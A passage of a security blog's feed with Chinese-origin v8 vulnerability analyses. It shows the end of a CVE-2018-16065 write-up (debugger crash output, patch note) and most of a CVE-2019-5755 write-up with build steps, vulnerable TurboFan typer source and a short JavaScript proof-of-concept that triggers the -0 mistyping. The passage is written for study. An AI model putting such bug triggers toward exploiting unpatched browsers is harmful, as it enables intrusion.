class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span 
class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; r</span><br><span class="line">Starting program: /usr/class/v8/v8/out/x64.debug/d8 --allow-natives-syntax --expose-gc test.js</span><br><span class="line">[Thread debugging using libthread_db enabled]</span><br><span class="line">Using host libthread_db library <span class="string">&quot;/lib/x86_64-linux-gnu/libthread_db.so.1&quot;</span>.</span><br><span class="line">[New Thread 0x7f1802341700 (LWP 87692)]</span><br><span class="line">[New Thread 0x7f1801b40700 (LWP 87693)]</span><br><span class="line">[New Thread 0x7f180133f700 (LWP 87694)]</span><br><span class="line">[New Thread 0x7f1800b3e700 (LWP 87695)]</span><br><span class="line">[New Thread 0x7f180033d700 (LWP 87696)]</span><br><span class="line">[New Thread 0x7f17ffb3c700 (LWP 87697)]</span><br><span class="line">[New Thread 0x7f17ff33b700 (LWP 87698)]</span><br><span class="line">callback</span><br><span class="line"></span><br><span class="line">Thread 1 <span class="string">&quot;d8&quot;</span> received signal SIGSEGV, Segmentation fault.</span><br><span class="line">0x00007f180468f76b <span class="keyword">in</span> std::__1::__hash_table&lt;std::__1::__hash_value_type&lt;unsigned long, v8::internal::Cancelable*&gt;, std::__1::__unordered_map_hasher&lt;unsigned long, std::__1::__hash_value_type&lt;unsigned long, v8::internal::Cancelable*&gt;, std::__1::<span class="built_in">hash</span>&lt;unsigned long&gt;, <span class="literal">true</span>&gt;, std::__1::__unordered_map_equal&lt;unsigned long, std::__1::__hash_value_type&lt;unsigned 
long, v8::internal::Cancelable*&gt;, std::__1::equal_to&lt;unsigned long&gt;, <span class="literal">true</span>&gt;, std::__1::allocator&lt;std::__1::__hash_value_type&lt;unsigned long, v8::internal::Cancelable*&gt; &gt; &gt;::__emplace_unique_key_args&lt;unsigned long, std::__1::piecewise_construct_t const&amp;, std::__1::tuple&lt;unsigned long const&amp;&gt;, std::__1::tuple&lt;&gt; &gt;(unsigned long const&amp;, std::__1::piecewise_construct_t const&amp;, std::__1::tuple&lt;unsigned long const&amp;&gt;&amp;&amp;, std::__1::tuple&lt;&gt;&amp;&amp;) (this=0x559480f98fc8, __k=@0x7ffd622fe4c8: 22, __args=..., __args=..., __args=...) at ../../buildtools/third_party/libc++/trunk/include/__hash_table:2010       </span><br><span class="line">2010                <span class="keyword">for</span> (__nd = __nd-&gt;__next_; __nd != nullptr &amp;&amp;</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">─────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────</span><br><span class="line"> RAX  0xdeadbeef</span><br><span class="line"> RBX  0x7f1804602220 ◂— push   rbp</span><br><span class="line"> RCX  0x559480f98fc8 —▸ 0x559480ff5c50 ◂— 0xdeadbeef</span><br><span class="line"> RDX  0x0</span><br><span class="line"> RDI  0x7ffd622fe4c8 ◂— 0x16</span><br><span class="line"> RSI  0x16</span><br><span class="line"> R8   0x559480f99020 ◂— 0x1</span><br><span class="line"> R9   0x10</span><br><span class="line"> R10  0x0</span><br><span class="line"> R11  0x7f1802ecaca0 (main_arena+96) —▸ 0x559481034310 ◂— 0x0</span><br><span class="line"> R12  0xffffffffffffffff</span><br><span class="line"> R13  0x559480f8efb8 —▸ 0xba4cbf82ba9 ◂— 0xba4cbf822</span><br><span class="line"> R14  0x5</span><br><span class="line"> R15  0x7ffd622ffc08 —▸ 0x1d3adb982e39 ◂— 0xb10000254d0fb8ae</span><br><span class="line"> RBP  0x7ffd622fe480 —▸ 0x7ffd622fe560 —▸ 
0x7ffd622fe590 —▸ 0x7ffd622fe5c0 —▸ 0x7ffd622fe5f0 ◂— ...</span><br><span class="line"> RSP  0x7ffd622fdd60 —▸ 0x7ffd622fdf90 ◂— 0x0</span><br><span class="line"> RIP  0x7f180468f76b ◂— mov    rax, qword ptr [rax]</span><br><span class="line">───────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────</span><br><span class="line"> ► 0x7f180468f76b    mov    rax, qword ptr [rax]</span><br><span class="line">   0x7f180468f76e    mov    qword ptr [rbp - 0x598], rax</span><br><span class="line">   0x7f180468f775    xor    eax, eax</span><br><span class="line">   0x7f180468f777    mov    cl, al</span><br><span class="line">   0x7f180468f779    cmp    qword ptr [rbp - 0x598], 0</span><br><span class="line">   0x7f180468f781    mov    byte ptr [rbp - 0x689], cl</span><br><span class="line">   0x7f180468f787    je     0x7f180468f88e &lt;0x7f180468f88e&gt;</span><br><span class="line">    ↓</span><br><span class="line">   0x7f180468f88e    mov    al, byte ptr [rbp - 0x689]</span><br><span class="line">   0x7f180468f894    <span class="built_in">test</span>   al, 1</span><br><span class="line">   0x7f180468f896    jne    0x7f180468f8a1 &lt;0x7f180468f8a1&gt;</span><br><span class="line">    ↓</span><br><span class="line">   0x7f180468f8a1    mov    rax, qword ptr [rbp - 0x678]</span><br><span class="line">───────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────</span><br><span class="line">In file: /usr/class/v8/v8/buildtools/third_party/libc++/trunk/include/__hash_table</span><br><span class="line">   2005     &#123;</span><br><span class="line">   2006         __chash = __constrain_hash(__hash, __bc);</span><br><span class="line">   2007         __nd = __bucket_list_[__chash];</span><br><span class="line">   2008         <span class="keyword">if</span> (__nd != nullptr)</span><br><span class="line">   2009         
&#123;</span><br><span class="line"> ► 2010             <span class="keyword">for</span> (__nd = __nd-&gt;__next_; __nd != nullptr &amp;&amp;</span><br><span class="line">   2011                 (__nd-&gt;__hash() == __hash || __constrain_hash(__nd-&gt;__hash(), __bc) == __chash);</span><br><span class="line">   2012                                                            __nd = __nd-&gt;__next_)</span><br><span class="line">   2013             &#123;</span><br><span class="line">   2014                 <span class="keyword">if</span> (key_eq()(__nd-&gt;__upcast()-&gt;__value_, __k))</span><br><span class="line">   2015                     goto __done;</span><br><span class="line">───────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────</span><br><span class="line">00:0000│ rsp  0x7ffd622fdd60 —▸ 0x7ffd622fdf90 ◂— 0x0</span><br><span class="line">01:0008│      0x7ffd622fdd68 —▸ 0x559481012378 —▸ 0x559481012310 —▸ 0x7f18058b3d60 —▸ 0x7f180483bc10 (v8::internal::Sweeper::IncrementalSweeperTask::~IncrementalSweeperTask()) ◂— ...                                                                                          </span><br><span class="line">02:0010│      0x7ffd622fdd70 ◂— 0x0</span><br><span class="line">03:0018│      0x7ffd622fdd78 —▸ 0x7ffd622fe450 —▸ 0x559480f99020 ◂— 0x1</span><br><span class="line">04:0020│      0x7ffd622fdd80 ◂— 9 /* <span class="string">&#x27;\t&#x27;</span> */</span><br><span class="line">... 
↓</span><br><span class="line">06:0030│      0x7ffd622fdd90 —▸ 0x559481012360 —▸ 0x5594810122e0 —▸ 0x559480fd85d0 —▸ 0x559480ff43e0 ◂— ...</span><br><span class="line">07:0038│      0x7ffd622fdd98 —▸ 0x559480fe96d0 —▸ 0x559480fe9700 ◂— 0x0</span><br><span class="line">─────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────</span><br><span class="line"> ► f 0     7f180468f76b</span><br><span class="line">   f 1     7f180468f76b</span><br><span class="line">   f 2     7f180468e086 v8::internal::CancelableTaskManager::Register(v8::internal::Cancelable*)+502</span><br><span class="line">   f 3     7f180468de7a v8::internal::Cancelable::Cancelable(v8::internal::CancelableTaskManager*)+106</span><br><span class="line">   f 4     7f180468f237 v8::internal::CancelableTask::CancelableTask(v8::internal::CancelableTaskManager*)+39</span><br><span class="line">   f 5     7f180468f200 v8::internal::CancelableTask::CancelableTask(v8::internal::Isolate*)+48</span><br><span class="line">   f 6     7f1804d79983</span><br><span class="line">   f 7     7f1804d71c98</span><br><span class="line">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────</span><br></pre></td></tr></table></figure></li></ul></li></ul><h2 id="五、后记">5. Postscript</h2><p>The <a href="https://chromium.googlesource.com/v8/v8.git/+/7d47839dc062b69467f58c55aab7cc9abf78d687">patch</a> for this vulnerability is very simple: the statement that calls ToBigInt is moved before the conditional check. That way, a neutering caused by the user's JS callback is also caught by the if check.</p><h2 id="六、参考">6. References</h2><ul><li><a href="https://bugs.chromium.org/p/chromium/issues/detail?id=867776">Issue 867776: V8 OOB write BigInt64Array.of and BigInt64Array.from side effect neuter</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、前言&quot;&gt;1. Preface&lt;/h2&gt;
&lt;p&gt;CVE-2018-16065 is a vulnerability inside v8's &lt;code&gt;EmitBigTypedArrayElementStore&lt;/code&gt; function. After checking whether the corresponding ArrayBuffer has been detached (i.e. whether it is &lt;code&gt;neutered&lt;/code&gt;), the function calls &lt;code&gt;ToBigInt&lt;/code&gt;, which has &lt;strong&gt;side effects&lt;/strong&gt; (i.e. it &lt;strong&gt;can invoke user JS callback code&lt;/strong&gt;). Inside that callback, the user can turn the BigIntArray that already passed the check (i.e. a &lt;strong&gt;TypedArray that was not neutered&lt;/strong&gt;) into a &lt;code&gt;neutered&lt;/code&gt; one.&lt;/p&gt;
&lt;p&gt;As a result, some data is illegally written to an ArrayBuffer that has already been detached. If the GC then tries to reclaim that ArrayBuffer's backing store, it triggers a crash.&lt;/p&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="v8" scheme="https://kiprey.github.io/categories/vulnerability-analysis/v8/"/>
    
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2019-5755 Analysis</title>
    <link href="https://kiprey.github.io/2021/02/CVE-2019-5755/"/>
    <id>https://kiprey.github.io/2021/02/CVE-2019-5755/</id>
    <published>2021-02-13T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.755Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、前言">I. Preface</h2><ul><li><p>CVE-2019-5755 is a missing-type-information vulnerability in v8's TurboFan. It causes the computed result type of SpeculativeSafeIntegerSubtract to lack the MinusZero (i.e. -0) type. This lets TurboFan compute an incorrect Range, which can then be used to build out-of-bounds read/write primitives and even to execute shellcode.</p></li><li><p>The v8 version used for reproduction is <code>7.1.302.28</code> (any version before commit ID <code>a62e9dd69957d9b1d0a56f825506408960a283fc</code> also works).</p></li></ul><span id="more"></span><h2 id="二、环境搭建">II. Environment Setup</h2><ul><li><p>Check out the v8 version, then build:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git checkout 7.1.302.28</span><br><span class="line">gclient <span class="built_in">sync</span></span><br><span class="line">tools/dev/v8gen.py x64.debug</span><br><span class="line">ninja -C out.gn/x64.debug  </span><br></pre></td></tr></table></figure></li><li><p>Start turbolizer. If the turbolizer that ships with this version does not work, you can use the online version of <a href="https://v8.github.io/tools/head/turbolizer/index.html">turbolizer</a>.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> tools/turbolizer</span><br><span class="line">npm i</span><br><span class="line">npm run-script build</span><br><span class="line">python -m SimpleHTTPServer 8000&amp;</span><br><span class="line">google-chrome http://127.0.0.1:8000</span><br></pre></td></tr></table></figure></li></ul><h2 id="三、漏洞细节">III. Vulnerability Details</h2><ul><li><p>TurboFan's Typer sets the type of SpeculativeSafeIntegerSubtract to its intersection with kSafeInteger, <strong>but this does not account for <code>-0</code> (i.e. MinusZero).</strong> For example, the expression <code>((-0) - 0)</code> should return <code>-0</code>, but because the Typer takes the intersection of the two types, it drops the MinusZero (-0) case. This wrong case can be used to make the compiler perform incorrect range computations.</p><p>Below is the source code of SpeculativeSafeIntegerSubtract (the vulnerable function) and SpeculativeSafeIntegerAdd (shown for comparison):</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Type <span class="title">OperationTyper::SpeculativeSafeIntegerAdd</span><span class="params">(Type lhs, Type rhs)</span> </span>&#123;</span><br><span class="line">  Type result = <span class="built_in">SpeculativeNumberAdd</span>(lhs, rhs);</span><br><span class="line">  <span class="comment">// If we have a Smi or Int32 feedback, the representation selection will</span></span><br><span class="line">  <span class="comment">// either truncate or it will check the inputs (i.e., deopt if not int32).</span></span><br><span class="line">  <span class="comment">// In either case the result will be in the safe integer range, so we</span></span><br><span class="line">  <span class="comment">// can bake in the type here. 
This needs to be in sync with</span></span><br><span class="line">  <span class="comment">// SimplifiedLowering::VisitSpeculativeAdditiveOp.</span></span><br><span class="line">  <span class="keyword">return</span> Type::<span class="built_in">Intersect</span>(result, cache_.kSafeIntegerOrMinusZero, <span class="built_in">zone</span>());</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">Type <span class="title">OperationTyper::SpeculativeSafeIntegerSubtract</span><span class="params">(Type lhs, Type rhs)</span> </span>&#123;</span><br><span class="line">  Type result = <span class="built_in">SpeculativeNumberSubtract</span>(lhs, rhs);</span><br><span class="line">  <span class="comment">// If we have a Smi or Int32 feedback, the representation selection will</span></span><br><span class="line">  <span class="comment">// either truncate or it will check the inputs (i.e., deopt if not int32).</span></span><br><span class="line">  <span class="comment">// In either case the result will be in the safe integer range, so we</span></span><br><span class="line">  <span class="comment">// can bake in the type here. This needs to be in sync with</span></span><br><span class="line">  <span class="comment">// SimplifiedLowering::VisitSpeculativeAdditiveOp.</span></span><br><span class="line">    </span><br><span class="line">  <span class="comment">/* </span></span><br><span class="line"><span class="comment">    Intersect the result of subtracting the operands (the variable `result`) with the `kSafeInteger` type and return the **intersection**.</span></span><br><span class="line"><span class="comment">    !!! Note that this uses cache_.kSafeInteger,</span></span><br><span class="line"><span class="comment">    which differs from the cache_.kSafeIntegerOrMinusZero used by SpeculativeSafeIntegerAdd above.</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line">  <span class="keyword">return</span> result = Type::<span class="built_in">Intersect</span>(result, cache_.kSafeInteger, <span class="built_in">zone</span>());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Below is the PoC for this vulnerability:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">foo</span>(<span class="params">trigger</span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> idx = <span class="title class_">Object</span>.<span class="title function_">is</span>((trigger ? 
-<span class="number">0</span> : <span class="number">0</span>) - <span class="number">0</span>, -<span class="number">0</span>);</span><br><span class="line">    <span class="keyword">return</span> idx;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">false</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(foo);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">true</span>)); <span class="comment">// expected: true, got: false</span></span><br></pre></td></tr></table></figure><p>Normally, <code>foo(true)</code> should always return true (because $-0 - 0 = -0$), but after optimization the result is false.</p><p>Let's look at what turbolizer shows:</p><p><img src="/2021/02/CVE-2019-5755/poc_turbolizer.png" alt="img"></p><p>As shown, for the case $$\{MinusZero \mid Range(0,0)\} - Range(0,0)$$, the Type of SpeculativeSafeIntegerSubtract does not contain MinusZero.</p><p>Therefore, in <code>TypedLoweringPhase - TypedOptimization::ReduceSameValue</code>, TurboFan always optimizes the SameValue node to false, because $MinusZero \ne Range(0, 0)$.</p><p><img src="/2021/02/CVE-2019-5755/samevalue_turbolizer.png" alt="img"></p></li><li><p>The SameValue node is generated from a call to <code>Object.is</code> in JS. Its purpose is to determine whether the left and right operands are the same value.</p><p>Specifically, it is generated through the following call chain:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">InliningPhase::Run</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    Reduction <span class="title">JSCallReducer::ReduceJSCall</span><span 
class="params">(...)</span></span></span><br><span class="line"><span class="function">      Reduction <span class="title">JSCallReducer::ReduceObjectIs</span><span class="params">(Node* node)</span></span></span><br></pre></td></tr></table></figure><p>The source code of ReduceObjectIs is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ES section #sec-object.is</span></span><br><span class="line"><span class="function">Reduction <span class="title">JSCallReducer::ReduceObjectIs</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(IrOpcode::kJSCall, node-&gt;<span class="built_in">opcode</span>());</span><br><span class="line">  CallParameters <span class="type">const</span>&amp; params = <span class="built_in">CallParametersOf</span>(node-&gt;<span class="built_in">op</span>());</span><br><span class="line">  <span class="type">int</span> <span class="type">const</span> argc = <span class="built_in">static_cast</span>&lt;<span class="type">int</span>&gt;(params.<span class="built_in">arity</span>() - <span class="number">2</span>);</span><br><span class="line">  Node* lhs = (argc &gt;= <span class="number">1</span>) ? 
NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">2</span>)</span><br><span class="line">                          : <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">UndefinedConstant</span>();</span><br><span class="line">  Node* rhs = (argc &gt;= <span class="number">2</span>) ? NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">3</span>)</span><br><span class="line">                          : <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">UndefinedConstant</span>();</span><br><span class="line">  <span class="comment">// Create the SameValue node</span></span><br><span class="line">  Node* value = <span class="built_in">graph</span>()-&gt;<span class="built_in">NewNode</span>(<span class="built_in">simplified</span>()-&gt;<span class="built_in">SameValue</span>(), lhs, rhs);</span><br><span class="line">  <span class="built_in">ReplaceWithValue</span>(node, value);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">Replace</span>(value);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>During the TyperPhase, the Typer tries to compute the type of the SameValue node. It follows this call chain:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Type Typer::Visitor::<span class="built_in">TypeSameValue</span>(Node* node)</span><br><span class="line">  Type Typer::Visitor::<span class="built_in">SameValueTyper</span>(Type lhs, Type rhs, Typer* t)</span><br><span class="line">    <span class="function">Type <span class="title">OperationTyper::SameValue</span><span class="params">(Type lhs, Type rhs)</span></span></span><br></pre></td></tr></table></figure><p>The chain ends at <code>OperationTyper::SameValue</code>, which computes the node's type:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Type <span class="title">OperationTyper::SameValue</span><span class="params">(Type lhs, Type rhs)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!<span class="built_in">JSType</span>(lhs).<span class="built_in">Maybe</span>(<span class="built_in">JSType</span>(rhs))) <span class="keyword">return</span> <span class="built_in">singleton_false</span>();</span><br><span class="line">  <span class="keyword">if</span> (lhs.<span class="built_in">Is</span>(Type::<span class="built_in">NaN</span>())) &#123;</span><br><span class="line">    <span class="keyword">if</span> (rhs.<span class="built_in">Is</span>(Type::<span class="built_in">NaN</span>())) <span class="keyword">return</span> <span class="built_in">singleton_true</span>();</span><br><span class="line">    <span class="keyword">if</span> (!rhs.<span class="built_in">Maybe</span>(Type::<span class="built_in">NaN</span>())) <span class="keyword">return</span> <span class="built_in">singleton_false</span>();</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (rhs.<span class="built_in">Is</span>(Type::<span class="built_in">NaN</span>())) &#123;</span><br><span class="line">    <span 
class="keyword">if</span> (!lhs.<span class="built_in">Maybe</span>(Type::<span class="built_in">NaN</span>())) <span class="keyword">return</span> <span class="built_in">singleton_false</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (lhs.<span class="built_in">Is</span>(Type::<span class="built_in">MinusZero</span>())) &#123;</span><br><span class="line">    <span class="keyword">if</span> (rhs.<span class="built_in">Is</span>(Type::<span class="built_in">MinusZero</span>())) <span class="keyword">return</span> <span class="built_in">singleton_true</span>();</span><br><span class="line">    <span class="keyword">if</span> (!rhs.<span class="built_in">Maybe</span>(Type::<span class="built_in">MinusZero</span>())) <span class="keyword">return</span> <span class="built_in">singleton_false</span>();</span><br><span class="line">   <span class="comment">// If one operand is MinusZero and the other cannot be MinusZero, return false.</span></span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (rhs.<span class="built_in">Is</span>(Type::<span class="built_in">MinusZero</span>())) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!lhs.<span class="built_in">Maybe</span>(Type::<span class="built_in">MinusZero</span>())) <span class="keyword">return</span> <span class="built_in">singleton_false</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (lhs.<span class="built_in">Is</span>(Type::<span class="built_in">OrderedNumber</span>()) &amp;&amp; rhs.<span class="built_in">Is</span>(Type::<span class="built_in">OrderedNumber</span>()) &amp;&amp;</span><br><span class="line">      (lhs.<span class="built_in">Max</span>() &lt; rhs.<span class="built_in">Min</span>() || lhs.<span class="built_in">Min</span>() &gt; rhs.<span class="built_in">Max</span>())) &#123;</span><br><span class="line">    <span 
class="keyword">return</span> <span class="built_in">singleton_false</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> Type::<span class="built_in">Boolean</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Once the SameValue node has been given a definite type (i.e. true / false), TurboFan's ConstantFoldingReducer, which runs in the TypedLoweringPhase, replaces the SameValue node with the previously computed HeapConstant:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">ConstantFoldingReducer::Reduce</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  DisallowHeapAccess no_heap_access;</span><br><span class="line"><span class="comment">// Check if the output type is a 
singleton.  In that case we already know the</span></span><br><span class="line">  <span class="comment">// result value and can simply replace the node if it&#x27;s eliminable.</span></span><br><span class="line">  <span class="comment">// If the node's type is a singleton, i.e. it has exactly one possible value, try to fold it</span></span><br><span class="line">  <span class="keyword">if</span> (!NodeProperties::<span class="built_in">IsConstant</span>(node) &amp;&amp; NodeProperties::<span class="built_in">IsTyped</span>(node) &amp;&amp;</span><br><span class="line">      node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">HasProperty</span>(Operator::kEliminatable)) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// We can only constant-fold nodes here, that are known to not cause any</span></span><br><span class="line">    <span class="comment">// side-effect, may it be a JavaScript observable side-effect or a possible</span></span><br><span class="line">    <span class="comment">// eager deoptimization exit (i.e. 
&#123;node&#125; has an operator that doesn&#x27;t have</span></span><br><span class="line">    <span class="comment">// the Operator::kNoDeopt property).</span></span><br><span class="line">    <span class="comment">// Get the type of the current node</span></span><br><span class="line">    Type upper = NodeProperties::<span class="built_in">GetType</span>(node);</span><br><span class="line">    <span class="keyword">if</span> (!upper.<span class="built_in">IsNone</span>()) &#123;</span><br><span class="line">      Node* replacement = <span class="literal">nullptr</span>;</span><br><span class="line">      <span class="comment">// If the node's type is a HeapConstant</span></span><br><span class="line">      <span class="keyword">if</span> (upper.<span class="built_in">IsHeapConstant</span>()) &#123;</span><br><span class="line">        replacement = <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">Constant</span>(upper.<span class="built_in">AsHeapConstant</span>()-&gt;<span class="built_in">Ref</span>());</span><br><span class="line">      &#125; <span class="keyword">else</span> <span class="keyword">if</span> <span class="comment">// ...</span></span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line">      <span class="keyword">if</span> (replacement) &#123;</span><br><span class="line">        <span class="comment">// Make sure the node has a type.</span></span><br><span class="line">        <span class="comment">// Type the replacement if needed, then substitute it for the node</span></span><br><span class="line">        <span class="keyword">if</span> (!NodeProperties::<span class="built_in">IsTyped</span>(replacement)) &#123;</span><br><span class="line">          NodeProperties::<span class="built_in">SetType</span>(replacement, upper);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">ReplaceWithValue</span>(node, replacement);</span><br><span class="line">        <span class="keyword">return</span> <span 
class="built_in">Changed</span>(replacement);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>If SameValue cannot be given a definite type, a different optimization is applied in the TypedLoweringPhase by <code>TypedOptimization::ReduceSameValue</code>. Its source code, shown below, lays out exactly how ReduceSameValue proceeds:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span 